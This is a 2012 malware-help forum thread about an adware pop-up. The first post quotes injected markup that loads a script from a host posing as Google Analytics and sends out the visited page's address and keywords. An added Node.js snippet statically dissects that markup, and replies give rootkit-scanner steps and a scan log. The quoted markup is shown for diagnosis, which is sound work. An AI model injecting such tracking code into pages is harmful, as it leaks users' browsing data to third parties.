Google Analytics banner pop up?


17 replies to this topic

#1 mattsbach

Posted 13 April 2012 - 12:08 PM

Hi - I am getting a little sliding window pop-up on the bottom left of my browser (Firefox). I am running Windows 7 Pro. I looked at the source code of the banner - it is:

The script that appears to be generating the banner:
<script src="http://www.google-analytics.com/gs.js?1&amp;code=4f8856e670224&amp;title=&amp;keywords=&amp;keywords_text=string%2Cpiano%2Csolo%2Corchestra%2Cquartet%2Cla&amp;ref=http%3A%2F%2Fwww.dominikmaican.com%2Fworks.php&amp;u=0&amp;pref=http%3A%2F%2Fwww.dominikmaican.com%2F&amp;utmcc=__utma%3D%2B__utmz%3D" async=""></script><div><div id="0.8031048317639154" style="cursor: pointer; position: fixed; right: 0pt; width: 200px; border: 2px solid black; background-color: white; text-align: center; padding: 5px; bottom: 4px;"><div onclick="kdfjunfldi_minimizeBanner();" style="background: url(&quot;http://www.google-analytics.com/img/close-btn.png&quot;) no-repeat scroll 1px 1px transparent; position: absolute; top: -17px; right: 0pt; height: 13px; width: 13px; margin: 0pt; padding: 0pt;"></div><div onclick="kdfjunfldi_goByBanner();" style="margin: 0pt; padding: 0pt;"><h5 style="font-size: 10px; font-weight: normal; margin: -5px 0pt; padding-bottom: 5px; text-align: right;">Sponsored ads</h5><h1 style="font-size: 24px; border-bottom: 2px dotted blue;"><a style="font-size: 24px; color: black; text-decoration: underline; line-height: 1;" onclick="return false;" class="addeyaw" href="#">Solo Piano by Jeff Bjorck</a></h1><br><p style="font-size: 16px;">Preview Bjorck's stunning solo piano CDs, MP3s, and sheet music.</p></div></div></div><div><div onclick="kdfjunfldi_maximizeBanner();" id="0.01357293031746365" style="z-index: 9999; display: none; cursor: pointer; position: fixed ! important; right: 0pt; bottom: 0pt; font-size: 16px; width: 200px; height: 20px; border: 2px solid black; text-align: center; padding: 5px; margin: 0pt; background-color: white; color: black; overflow: hidden;">Recommended for You</div></div>

The code of the actual generated banner:
<div onclick="kdfjunfldi_goByBanner();" style="margin: 0pt; padding: 0pt;"><h5 style="font-size: 10px; font-weight: normal; margin: -5px 0pt; padding-bottom: 5px; text-align: right;">Sponsored ads</h5><h1 style="font-size: 24px; border-bottom: 2px dotted blue;"><a style="font-size: 24px; color: black; text-decoration: underline; line-height: 1;" onclick="return false;" class="addeyaw" href="#">Solo Piano by Jeff Bjorck</a></h1><br><p style="font-size: 16px;">Preview Bjorck's stunning solo piano CDs, MP3s, and sheet music.</p></div>

It appears to be spyware - the PHP files themselves are not affected - not that I can see. The pop-up appears randomly on different sites. Can you help me diagnose and remove it? I have SpywareHunter (registered account) and Malware Bytes (free version).

Thanks for your help!
matthew

Edit: Moved topic from Windows 7 to the more appropriate forum. ~ Animal
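
Added example, not part of the original post: a Node.js triage of the markup quoted above, showing which fields the `gs.js` request carries in its query string and which inline handlers and fixed-position elements were injected with it. `SAMPLE` is an abridged copy of the posted markup, and all function names are hypothetical.

```javascript
// Added example: static triage of the banner markup quoted in post #1.
// SAMPLE is an abridged copy of that markup (most style declarations trimmed);
// nothing is fetched or executed, the string is only parsed.
const SAMPLE =
  '<script src="http://www.google-analytics.com/gs.js?1&amp;code=4f8856e670224&amp;title=&amp;keywords=' +
  '&amp;keywords_text=string%2Cpiano%2Csolo%2Corchestra%2Cquartet%2Cla' +
  '&amp;ref=http%3A%2F%2Fwww.dominikmaican.com%2Fworks.php&amp;u=0' +
  '&amp;pref=http%3A%2F%2Fwww.dominikmaican.com%2F&amp;utmcc=__utma%3D%2B__utmz%3D" async=""></script>' +
  '<div><div id="0.8031048317639154" style="cursor: pointer; position: fixed; right: 0pt; width: 200px;">' +
  '<div onclick="kdfjunfldi_minimizeBanner();" style="background: url(&quot;http://www.google-analytics.com/img/close-btn.png&quot;)' +
  ' no-repeat; position: absolute; top: -17px;"></div>' +
  '<div onclick="kdfjunfldi_goByBanner();" style="margin: 0pt;"><h5>Sponsored ads</h5>' +
  '<h1><a onclick="return false;" class="addeyaw" href="#">Solo Piano by Jeff Bjorck</a></h1></div></div></div>' +
  '<div><div onclick="kdfjunfldi_maximizeBanner();" id="0.01357293031746365"' +
  ' style="z-index: 9999; display: none; position: fixed ! important; right: 0pt;">Recommended for You</div></div>';

// Decode the few HTML entities that occur in attribute values ("&amp;" last,
// so an already-escaped entity is not decoded twice).
function decodeEntities(s) {
  return s.replace(/&quot;/g, '"').replace(/&lt;/g, '<').replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Collect double-quoted attribute values whose name matches namePattern (regex source).
function attrValues(html, namePattern) {
  const re = new RegExp('\\s(' + namePattern + ')\\s*=\\s*"([^"]*)"', 'gi');
  return [...html.matchAll(re)].map(m => ({ name: m[1].toLowerCase(), value: decodeEntities(m[2]) }));
}

// Break a script URL into host, path and its non-empty query fields.
// urlParams lists the fields whose value is itself a URL (page addresses sent along).
function describeScript(src) {
  let url;
  try { url = new URL(src); } catch { return null; }   // relative or malformed src: skip
  const params = {};
  const urlParams = [];
  for (const [key, value] of url.searchParams) {
    if (value === '') continue;                         // e.g. title= and keywords= are empty
    params[key] = value;
    if (/^https?:\/\//i.test(value)) urlParams.push(key);
  }
  return { host: url.hostname, path: url.pathname, params, urlParams };
}

// Names of functions called from inline on* handlers, in document order.
function handlerFunctions(html) {
  const names = new Set();
  for (const { value } of attrValues(html, 'on[a-z]+')) {
    for (const m of value.matchAll(/([A-Za-z_$][\w$]*)\s*\(/g)) names.add(m[1]);
  }
  return [...names];
}

// Longest prefix shared by all names; a common generated prefix ties the handlers together.
function sharedPrefix(names) {
  if (names.length === 0) return '';
  let prefix = names[0];
  for (const n of names) while (!n.startsWith(prefix)) prefix = prefix.slice(0, -1);
  return prefix;
}

function triage(html) {
  const scripts = [...html.matchAll(/<script\b[^>]*?\ssrc\s*=\s*"([^"]*)"/gi)]
    .map(m => describeScript(decodeEntities(m[1])))
    .filter(Boolean);
  const handlers = handlerFunctions(html);
  return {
    scripts,
    handlers,
    handlerPrefix: sharedPrefix(handlers),
    // Elements pinned to the viewport, which is how the banner stays on screen.
    fixedOverlays: attrValues(html, 'style').filter(a => /position\s*:\s*fixed/i.test(a.value)).length,
    // ids that are a bare decimal fraction rather than a name chosen by a page author.
    decimalIds: attrValues(html, 'id').filter(a => /^0\.\d+$/.test(a.value)).length,
  };
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

The decoded `ref` and `pref` fields hold addresses on the site being browsed, and `keywords_text` holds words taken from it, so the request itself is worth capturing alongside the scan logs.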

#2 narenxp

Posted 13 April 2012 - 10:46 PM

Download

TDSSkiller

Launch it. Click on Change parameters, then select TDLFS file system.

Click on "Scan". Please post the log report (the log file should be in your C drive).


Please download GMER from here (does not work on 64-bit OS):

http://www2.gmer.net/download.php

Temporarily disable any real-time active protection so your security programs will not conflict with gmer's driver.

GMER will open to the Rootkit/Malware tab and perform an automatic Full Scan when first run. (do not use the computer while the scan is in progress)

If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click NO.
Now click the Scan button. If you see a rootkit warning window, click OK.
When the scan is finished, click the Save... button to save the scan results to your Desktop. Save the file as gmer.log.
Click the Copy button and paste the results into your next reply.


Download

aswMBR

Launch it and allow it to download the latest Avast! virus definitions.
Click the "Scan" button to start the scan. After the scan finishes, click on Save log.

Post the log results here

#3 kevincol

Posted 15 April 2012 - 10:30 PM

Hi,

I have the exact same problem as described in the original post. I am running 64bit Windows, so what rootkit remover could I run as GMER is 32bit only?

#4 narenxp

Posted 15 April 2012 - 11:24 PM

@kevin

Create a new topic to avoid confusion.

Thanks

#5 mattsbach

Posted 16 April 2012 - 01:41 PM

Thank you:

14:29:49.0632 7520 TDSS rootkit removing tool 2.7.28.0 Apr 10 2012 16:54:05
14:29:49.0832 7520 ============================================================
14:29:49.0832 7520 Current date / time: 2012/04/16 14:29:49.0832
14:29:49.0832 7520 SystemInfo:
14:29:49.0832 7520
14:29:49.0832 7520 OS Version: 6.1.7601 ServicePack: 1.0
14:29:49.0832 7520 Product type: Workstation
14:29:49.0832 7520 ComputerName: OWNER-PC110658
14:29:49.0832 7520 UserName: Owner
14:29:49.0832 7520 Windows directory: C:\Windows
14:29:49.0832 7520 System windows directory: C:\Windows
14:29:49.0832 7520 Running under WOW64
14:29:49.0832 7520 Processor architecture: Intel x64
14:29:49.0832 7520 Number of processors: 8
14:29:49.0832 7520 Page size: 0x1000
14:29:49.0832 7520 Boot type: Normal boot
14:29:49.0832 7520 ============================================================
14:29:50.0191 7520 Drive \Device\Harddisk0\DR0 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
14:29:50.0192 7520 Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 (931.51 Gb), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
14:29:50.0195 7520 Drive \Device\Harddisk2\DR2 - Size: 0xE8E0DB6000 (931.51 Gb), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:29:50.0196 7520 Drive \Device\Harddisk3\DR3 - Size: 0x7446E00000 (465.11 Gb), SectorSize: 0x200, Cylinders: 0xED2B, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:29:50.0495 7520 Drive \Device\Harddisk4\DR4 - Size: 0x7470C05E00 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
14:29:50.0507 7520 \Device\Harddisk0\DR0:
14:29:50.0519 7520 MBR used
14:29:50.0519 7520 \Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x38949991
14:29:50.0519 7520 \Device\Harddisk1\DR1:
14:29:50.0519 7520 MBR used
14:29:50.0519 7520 \Device\Harddisk1\DR1\Partition0: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800
14:29:50.0519 7520 \Device\Harddisk2\DR2:
14:29:50.0520 7520 MBR used
14:29:50.0520 7520 \Device\Harddisk2\DR2\Partition0: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x74705982
14:29:50.0520 7520 \Device\Harddisk3\DR3:
14:29:50.0520 7520 MBR used
14:29:50.0520 7520 \Device\Harddisk3\DR3\Partition0: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x3A236800
14:29:50.0520 7520 \Device\Harddisk4\DR4:
14:29:50.0520 7520 MBR used
14:29:50.0520 7520 \Device\Harddisk4\DR4\Partition0: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x3A384C02
14:29:50.0680 7520 Initialize success
14:29:50.0680 7520 ============================================================
14:29:52.0371 1144 ============================================================
14:29:52.0371 1144 Scan started
14:29:52.0371 1144 Mode: Manual;
14:29:52.0371 1144 ============================================================
14:29:59.0255 1144 mouclass - ok
14:29:59.0266 1144 mouhid (d3bf052c40b0c4166d9fd86a4288c1e6) C:\Windows\system32\DRIVERS\mouhid.sys
14:29:59.0267 1144 mouhid - ok
14:29:59.0286 1144 mountmgr (32e7a3d591d671a6df2db515a5cbe0fa) C:\Windows\system32\drivers\mountmgr.sys
14:29:59.0287 1144 mountmgr - ok
14:29:59.0340 1144 mozybackup (19b2629c3f8e02b2e823738ff0ab1bfd) C:\Program Files\MozyHome\mozybackup.exe
14:29:59.0341 1144 mozybackup - ok
14:29:59.0369 1144 mozyFilter (a5c8838b68eddd5c738308b3a50cb350) C:\Windows\system32\DRIVERS\mozy.sys
14:29:59.0369 1144 mozyFilter - ok
14:29:59.0375 1144 mpio (a44b420d30bd56e145d6a2bc8768ec58) C:\Windows\system32\drivers\mpio.sys
14:29:59.0376 1144 mpio - ok
14:29:59.0381 1144 mpsdrv (6c38c9e45ae0ea2fa5e551f2ed5e978f) C:\Windows\system32\drivers\mpsdrv.sys
14:29:59.0381 1144 mpsdrv - ok
14:29:59.0424 1144 MpsSvc (54ffc9c8898113ace189d4aa7199d2c1) C:\Windows\system32\mpssvc.dll
14:29:59.0427 1144 MpsSvc - ok
14:29:59.0439 1144 MRxDAV (dc722758b8261e1abafd31a3c0a66380) C:\Windows\system32\drivers\mrxdav.sys
14:29:59.0439 1144 MRxDAV - ok
14:29:59.0462 1144 mrxsmb (a5d9106a73dc88564c825d317cac68ac) C:\Windows\system32\DRIVERS\mrxsmb.sys
14:29:59.0463 1144 mrxsmb - ok
14:29:59.0496 1144 mrxsmb10 (d711b3c1d5f42c0c2415687be09fc163) C:\Windows\system32\DRIVERS\mrxsmb10.sys
14:29:59.0497 1144 mrxsmb10 - ok
14:29:59.0510 1144 mrxsmb20 (9423e9d355c8d303e76b8cfbd8a5c30c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
14:29:59.0511 1144 mrxsmb20 - ok
14:29:59.0530 1144 msahci (c25f0bafa182cbca2dd3c851c2e75796) C:\Windows\system32\drivers\msahci.sys
14:29:59.0530 1144 msahci - ok
14:29:59.0565 1144 msdsm (db801a638d011b9633829eb6f663c900) C:\Windows\system32\drivers\msdsm.sys
14:29:59.0565 1144 msdsm - ok
14:29:59.0586 1144 MSDTC (de0ece52236cfa3ed2dbfc03f28253a8) C:\Windows\System32\msdtc.exe
14:29:59.0586 1144 MSDTC - ok
14:29:59.0601 1144 Msfs (aa3fb40e17ce1388fa1bedab50ea8f96) C:\Windows\system32\drivers\Msfs.sys
14:29:59.0601 1144 Msfs - ok
14:29:59.0625 1144 mshidkmdf (f9d215a46a8b9753f61767fa72a20326) C:\Windows\System32\drivers\mshidkmdf.sys
14:29:59.0625 1144 mshidkmdf - ok
14:29:59.0637 1144 msisadrv (d916874bbd4f8b07bfb7fa9b3ccae29d) C:\Windows\system32\drivers\msisadrv.sys
14:29:59.0637 1144 msisadrv - ok
14:29:59.0663 1144 MSiSCSI (808e98ff49b155c522e6400953177b08) C:\Windows\system32\iscsiexe.dll
14:29:59.0664 1144 MSiSCSI - ok
14:29:59.0668 1144 msiserver - ok
14:29:59.0693 1144 MSKSSRV (49ccf2c4fea34ffad8b1b59d49439366) C:\Windows\system32\drivers\MSKSSRV.sys
14:29:59.0694 1144 MSKSSRV - ok
14:29:59.0699 1144 MSPCLOCK (bdd71ace35a232104ddd349ee70e1ab3) C:\Windows\system32\drivers\MSPCLOCK.sys
14:29:59.0700 1144 MSPCLOCK - ok
14:29:59.0704 1144 MSPQM (4ed981241db27c3383d72092b618a1d0) C:\Windows\system32\drivers\MSPQM.sys
14:29:59.0705 1144 MSPQM - ok
14:29:59.0724 1144 MsRPC (759a9eeb0fa9ed79da1fb7d4ef78866d) C:\Windows\system32\drivers\MsRPC.sys
14:29:59.0725 1144 MsRPC - ok
14:29:59.0739 1144 mssmbios (0eed230e37515a0eaee3c2e1bc97b288) C:\Windows\system32\DRIVERS\mssmbios.sys
14:29:59.0739 1144 mssmbios - ok
14:29:59.0745 1144 MSTEE (2e66f9ecb30b4221a318c92ac2250779) C:\Windows\system32\drivers\MSTEE.sys
14:29:59.0745 1144 MSTEE - ok
14:29:59.0750 1144 MTConfig (7ea404308934e675bffde8edf0757bcd) C:\Windows\system32\drivers\MTConfig.sys
14:29:59.0751 1144 MTConfig - ok
14:29:59.0756 1144 Mup (f9a18612fd3526fe473c1bda678d61c8) C:\Windows\system32\Drivers\mup.sys
14:29:59.0756 1144 Mup - ok
14:29:59.0786 1144 mv61xx (7e045af28f71851aa5ece8c78aefce46) C:\Windows\system32\DRIVERS\mv61xx.sys
14:29:59.0786 1144 mv61xx - ok
14:29:59.0811 1144 napagent (582ac6d9873e31dfa28a4547270862dd) C:\Windows\system32\qagentRT.dll
14:29:59.0813 1144 napagent - ok
14:29:59.0860 1144 NativeWifiP (1ea3749c4114db3e3161156ffffa6b33) C:\Windows\system32\DRIVERS\nwifi.sys
14:29:59.0861 1144 NativeWifiP - ok
14:29:59.0892 1144 NDIS (79b47fd40d9a817e932f9d26fac0a81c) C:\Windows\system32\drivers\ndis.sys
14:29:59.0895 1144 NDIS - ok
14:29:59.0906 1144 NdisCap (9f9a1f53aad7da4d6fef5bb73ab811ac) C:\Windows\system32\DRIVERS\ndiscap.sys
14:29:59.0906 1144 NdisCap - ok
14:29:59.0923 1144 NdisTapi (30639c932d9fef22b31268fe25a1b6e5) C:\Windows\system32\DRIVERS\ndistapi.sys
14:29:59.0923 1144 NdisTapi - ok
14:29:59.0939 1144 Ndisuio (136185f9fb2cc61e573e676aa5402356) C:\Windows\system32\DRIVERS\ndisuio.sys
14:29:59.0939 1144 Ndisuio - ok
14:29:59.0946 1144 NdisWan (53f7305169863f0a2bddc49e116c2e11) C:\Windows\system32\DRIVERS\ndiswan.sys
14:29:59.0946 1144 NdisWan - ok
14:29:59.0958 1144 NDProxy (015c0d8e0e0421b4cfd48cffe2825879) C:\Windows\system32\drivers\NDProxy.sys
14:29:59.0958 1144 NDProxy - ok
14:29:59.0963 1144 NetBIOS (86743d9f5d2b1048062b14b1d84501c4) C:\Windows\system32\DRIVERS\netbios.sys
14:29:59.0963 1144 NetBIOS - ok
14:29:59.0970 1144 NetBT (09594d1089c523423b32a4229263f068) C:\Windows\system32\DRIVERS\netbt.sys
14:29:59.0971 1144 NetBT - ok
14:29:59.0997 1144 Netlogon (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:29:59.0998 1144 Netlogon - ok
14:30:00.0027 1144 Netman (847d3ae376c0817161a14a82c8922a9e) C:\Windows\System32\netman.dll
14:30:00.0029 1144 Netman - ok
14:30:00.0043 1144 netprofm (5f28111c648f1e24f7dbc87cdeb091b8) C:\Windows\System32\netprofm.dll
14:30:00.0044 1144 netprofm - ok
14:30:00.0093 1144 netr28ux (5eb01f698c4e2c11598934d4540047ca) C:\Windows\system32\DRIVERS\netr28ux.sys
14:30:00.0097 1144 netr28ux - ok
14:30:00.0137 1144 NetTcpPortSharing (3e5a36127e201ddf663176b66828fafe) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
14:30:00.0138 1144 NetTcpPortSharing - ok
14:30:00.0173 1144 nfrd960 (77889813be4d166cdab78ddba990da92) C:\Windows\system32\drivers\nfrd960.sys
14:30:00.0173 1144 nfrd960 - ok
14:30:00.0205 1144 NlaSvc (1ee99a89cc788ada662441d1e9830529) C:\Windows\System32\nlasvc.dll
14:30:00.0206 1144 NlaSvc - ok
14:30:00.0239 1144 Npfs (1e4c4ab5c9b8dd13179bbdc75a2a01f7) C:\Windows\system32\drivers\Npfs.sys
14:30:00.0239 1144 Npfs - ok
14:30:00.0257 1144 nsi (d54bfdf3e0c953f823b3d0bfe4732528) C:\Windows\system32\nsisvc.dll
14:30:00.0257 1144 nsi - ok
14:30:00.0273 1144 nsiproxy (e7f5ae18af4168178a642a9247c63001) C:\Windows\system32\drivers\nsiproxy.sys
14:30:00.0273 1144 nsiproxy - ok
14:30:00.0328 1144 Ntfs (a2f74975097f52a00745f9637451fdd8) C:\Windows\system32\drivers\Ntfs.sys
14:30:00.0333 1144 Ntfs - ok
14:30:00.0380 1144 NuidFltr (d4012918d3a3847b44b888d56bc095d6) C:\Windows\system32\DRIVERS\NuidFltr.sys
14:30:00.0380 1144 NuidFltr - ok
14:30:00.0401 1144 Null (9899284589f75fa8724ff3d16aed75c1) C:\Windows\system32\drivers\Null.sys
14:30:00.0401 1144 Null - ok
14:30:00.0419 1144 nusb3hub (01266516e6e88d183a2b58722eeb4443) C:\Windows\system32\DRIVERS\nusb3hub.sys
14:30:00.0420 1144 nusb3hub - ok
14:30:00.0444 1144 nusb3xhc (5ec04f55cc5f165f21752712437df638) C:\Windows\system32\DRIVERS\nusb3xhc.sys
14:30:00.0445 1144 nusb3xhc - ok
14:30:00.0486 1144 NVHDA (960e39a54e525df58cb29193147dffa1) C:\Windows\system32\drivers\nvhda64v.sys
14:30:00.0486 1144 NVHDA - ok
14:30:00.0880 1144 nvlddmkm (b34e9bfbd9c61048ef6281c3e7ec210a) C:\Windows\system32\DRIVERS\nvlddmkm.sys
14:30:00.0922 1144 nvlddmkm - ok
14:30:01.0085 1144 nvraid (0a92cb65770442ed0dc44834632f66ad) C:\Windows\system32\drivers\nvraid.sys
14:30:01.0086 1144 nvraid - ok
14:30:01.0116 1144 nvstor (dab0e87525c10052bf65f06152f37e4a) C:\Windows\system32\drivers\nvstor.sys
14:30:01.0116 1144 nvstor - ok
14:30:01.0169 1144 nvsvc (dfda089bb2cd0ff7e789e2ef6ba1e4ba) C:\Windows\system32\nvvsvc.exe
14:30:01.0173 1144 nvsvc - ok
14:30:01.0223 1144 nvUpdatusService (e7818cd4fb51284c948d68a7a85a69b8) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
14:30:01.0230 1144 nvUpdatusService - ok
14:30:01.0262 1144 nv_agp (270d7cd42d6e3979f6dd0146650f0e05) C:\Windows\system32\drivers\nv_agp.sys
14:30:01.0263 1144 nv_agp - ok
14:30:01.0269 1144 ohci1394 (3589478e4b22ce21b41fa1bfc0b8b8a0) C:\Windows\system32\drivers\ohci1394.sys
14:30:01.0270 1144 ohci1394 - ok
14:30:01.0340 1144 OpenVPNService (6c2e3718a4df94958515d30d8ac52e52) C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe
14:30:01.0341 1144 OpenVPNService - ok
14:30:01.0398 1144 ose (7a56cf3e3f12e8af599963b16f50fb6a) C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
14:30:01.0398 1144 ose - ok
14:30:01.0504 1144 p2pimsvc (3eac4455472cc2c97107b5291e0dcafe) C:\Windows\system32\pnrpsvc.dll
14:30:01.0505 1144 p2pimsvc - ok
14:30:01.0533 1144 p2psvc (927463ecb02179f88e4b9a17568c63c3) C:\Windows\system32\p2psvc.dll
14:30:01.0534 1144 p2psvc - ok
14:30:01.0561 1144 Parport (0086431c29c35be1dbc43f52cc273887) C:\Windows\system32\drivers\parport.sys
14:30:01.0562 1144 Parport - ok
14:30:01.0601 1144 partmgr (871eadac56b0a4c6512bbe32753ccf79) C:\Windows\system32\drivers\partmgr.sys
14:30:01.0601 1144 partmgr - ok
14:30:01.0617 1144 PcaSvc (3aeaa8b561e63452c655dc0584922257) C:\Windows\System32\pcasvc.dll
14:30:01.0618 1144 PcaSvc - ok
14:30:01.0629 1144 pci (94575c0571d1462a0f70bde6bd6ee6b3) C:\Windows\system32\drivers\pci.sys
14:30:01.0630 1144 pci - ok
14:30:01.0654 1144 pciide (b5b8b5ef2e5cb34df8dcf8831e3534fa) C:\Windows\system32\drivers\pciide.sys
14:30:01.0655 1144 pciide - ok
14:30:01.0678 1144 pcmcia (b2e81d4e87ce48589f98cb8c05b01f2f) C:\Windows\system32\drivers\pcmcia.sys
14:30:01.0679 1144 pcmcia - ok
14:30:01.0696 1144 pcw (d6b9c2e1a11a3a4b26a182ffef18f603) C:\Windows\system32\drivers\pcw.sys
14:30:01.0696 1144 pcw - ok
14:30:01.0706 1144 PEAUTH (68769c3356b3be5d1c732c97b9a80d6e) C:\Windows\system32\drivers\peauth.sys
14:30:01.0708 1144 PEAUTH - ok
14:30:01.0736 1144 PeerDistSvc (b9b0a4299dd2d76a4243f75fd54dc680) C:\Windows\system32\peerdistsvc.dll
14:30:01.0741 1144 PeerDistSvc - ok
14:30:01.0787 1144 PerfHost (e495e408c93141e8fc72dc0c6046ddfa) C:\Windows\SysWow64\perfhost.exe
14:30:01.0787 1144 PerfHost - ok
14:30:01.0820 1144 pla (c7cf6a6e137463219e1259e3f0f0dd6c) C:\Windows\system32\pla.dll
14:30:01.0825 1144 pla - ok
14:30:01.0857 1144 PlugPlay (25fbdef06c4d92815b353f6e792c8129) C:\Windows\system32\umpnpmgr.dll
14:30:01.0859 1144 PlugPlay - ok
14:30:01.0884 1144 PNRPAutoReg (7195581cec9bb7d12abe54036acc2e38) C:\Windows\system32\pnrpauto.dll
14:30:01.0884 1144 PNRPAutoReg - ok
14:30:01.0912 1144 PNRPsvc (3eac4455472cc2c97107b5291e0dcafe) C:\Windows\system32\pnrpsvc.dll
14:30:01.0914 1144 PNRPsvc - ok
14:30:01.0936 1144 PolicyAgent (4f15d75adf6156bf56eced6d4a55c389) C:\Windows\System32\ipsecsvc.dll
14:30:01.0938 1144 PolicyAgent - ok
14:30:01.0972 1144 Power (6ba9d927dded70bd1a9caded45f8b184) C:\Windows\system32\umpo.dll
14:30:01.0973 1144 Power - ok
14:30:02.0013 1144 PptpMiniport (f92a2c41117a11a00be01ca01a7fcde9) C:\Windows\system32\DRIVERS\raspptp.sys
14:30:02.0014 1144 PptpMiniport - ok
14:30:02.0035 1144 Processor (0d922e23c041efb1c3fac2a6f943c9bf) C:\Windows\system32\drivers\processr.sys
14:30:02.0035 1144 Processor - ok
14:30:02.0057 1144 ProfSvc (5c78838b4d166d1a27db3a8a820c799a) C:\Windows\system32\profsvc.dll
14:30:02.0058 1144 ProfSvc - ok
14:30:02.0079 1144 ProtectedStorage (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:30:02.0080 1144 ProtectedStorage - ok
14:30:02.0101 1144 Psched (0557cf5a2556bd58e26384169d72438d) C:\Windows\system32\DRIVERS\pacer.sys
14:30:02.0102 1144 Psched - ok
14:30:02.0133 1144 ql2300 (a53a15a11ebfd21077463ee2c7afeef0) C:\Windows\system32\drivers\ql2300.sys
14:30:02.0138 1144 ql2300 - ok
14:30:02.0160 1144 ql40xx (4f6d12b51de1aaeff7dc58c4d75423c8) C:\Windows\system32\drivers\ql40xx.sys
14:30:02.0161 1144 ql40xx - ok
14:30:02.0186 1144 QWAVE (906191634e99aea92c4816150bda3732) C:\Windows\system32\qwave.dll
14:30:02.0187 1144 QWAVE - ok
14:30:02.0203 1144 QWAVEdrv (76707bb36430888d9ce9d705398adb6c) C:\Windows\system32\drivers\qwavedrv.sys
14:30:02.0204 1144 QWAVEdrv - ok
14:30:02.0247 1144 radpms (58435613c2537715a9423597ec6635cc) C:\Windows\system32\DRIVERS\radpms.sys
14:30:02.0248 1144 radpms - ok
14:30:02.0269 1144 RasAcd (5a0da8ad5762fa2d91678a8a01311704) C:\Windows\system32\DRIVERS\rasacd.sys
14:30:02.0269 1144 RasAcd - ok
14:30:02.0298 1144 RasAgileVpn (7ecff9b22276b73f43a99a15a6094e90) C:\Windows\system32\DRIVERS\AgileVpn.sys
14:30:02.0298 1144 RasAgileVpn - ok
14:30:02.0336 1144 RasAuto (8f26510c5383b8dbe976de1cd00fc8c7) C:\Windows\System32\rasauto.dll
14:30:02.0337 1144 RasAuto - ok
14:30:02.0361 1144 Rasl2tp (471815800ae33e6f1c32fb1b97c490ca) C:\Windows\system32\DRIVERS\rasl2tp.sys
14:30:02.0362 1144 Rasl2tp - ok
14:30:02.0406 1144 RasMan (ee867a0870fc9e4972ba9eaad35651e2) C:\Windows\System32\rasmans.dll
14:30:02.0408 1144 RasMan - ok
14:30:02.0420 1144 RasPppoe (855c9b1cd4756c5e9a2aa58a15f58c25) C:\Windows\system32\DRIVERS\raspppoe.sys
14:30:02.0421 1144 RasPppoe - ok
14:30:02.0438 1144 RasSstp (e8b1e447b008d07ff47d016c2b0eeecb) C:\Windows\system32\DRIVERS\rassstp.sys
14:30:02.0439 1144 RasSstp - ok
14:30:02.0455 1144 rdbss (77f665941019a1594d887a74f301fa2f) C:\Windows\system32\DRIVERS\rdbss.sys
14:30:02.0456 1144 rdbss - ok
14:30:02.0463 1144 rdpbus (302da2a0539f2cf54d7c6cc30c1f2d8d) C:\Windows\system32\DRIVERS\rdpbus.sys
14:30:02.0463 1144 rdpbus - ok
14:30:02.0476 1144 RDPCDD (cea6cc257fc9b7715f1c2b4849286d24) C:\Windows\system32\DRIVERS\RDPCDD.sys
14:30:02.0476 1144 RDPCDD - ok
14:30:02.0495 1144 RDPDR (1b6163c503398b23ff8b939c67747683) C:\Windows\system32\drivers\rdpdr.sys
14:30:02.0496 1144 RDPDR - ok
14:30:02.0519 1144 RDPENCDD (bb5971a4f00659529a5c44831af22365) C:\Windows\system32\drivers\rdpencdd.sys
14:30:02.0520 1144 RDPENCDD - ok
14:30:02.0534 1144 RDPREFMP (216f3fa57533d98e1f74ded70113177a) C:\Windows\system32\drivers\rdprefmp.sys
14:30:02.0534 1144 RDPREFMP - ok
14:30:02.0590 1144 RDPWD (15b66c206b5cb095bab980553f38ed23) C:\Windows\system32\drivers\RDPWD.sys
14:30:02.0591 1144 RDPWD - ok
14:30:02.0598 1144 rdyboost (34ed295fa0121c241bfef24764fc4520) C:\Windows\system32\drivers\rdyboost.sys
14:30:02.0599 1144 rdyboost - ok
14:30:02.0637 1144 RemoteAccess (254fb7a22d74e5511c73a3f6d802f192) C:\Windows\System32\mprdim.dll
14:30:02.0637 1144 RemoteAccess - ok
14:30:02.0661 1144 RemoteRegistry (e4d94f24081440b5fc5aa556c7c62702) C:\Windows\system32\regsvc.dll
14:30:02.0662 1144 RemoteRegistry - ok
14:30:02.0679 1144 RpcEptMapper (e4dc58cf7b3ea515ae917ff0d402a7bb) C:\Windows\System32\RpcEpMap.dll
14:30:02.0679 1144 RpcEptMapper - ok
14:30:02.0700 1144 RpcLocator (d5ba242d4cf8e384db90e6a8ed850b8c) C:\Windows\system32\locator.exe
14:30:02.0700 1144 RpcLocator - ok
14:30:02.0722 1144 RpcSs (5c627d1b1138676c0a7ab2c2c190d123) C:\Windows\system32\rpcss.dll
14:30:02.0724 1144 RpcSs - ok
14:30:02.0761 1144 rspndr (ddc86e4f8e7456261e637e3552e804ff) C:\Windows\system32\DRIVERS\rspndr.sys
14:30:02.0761 1144 rspndr - ok
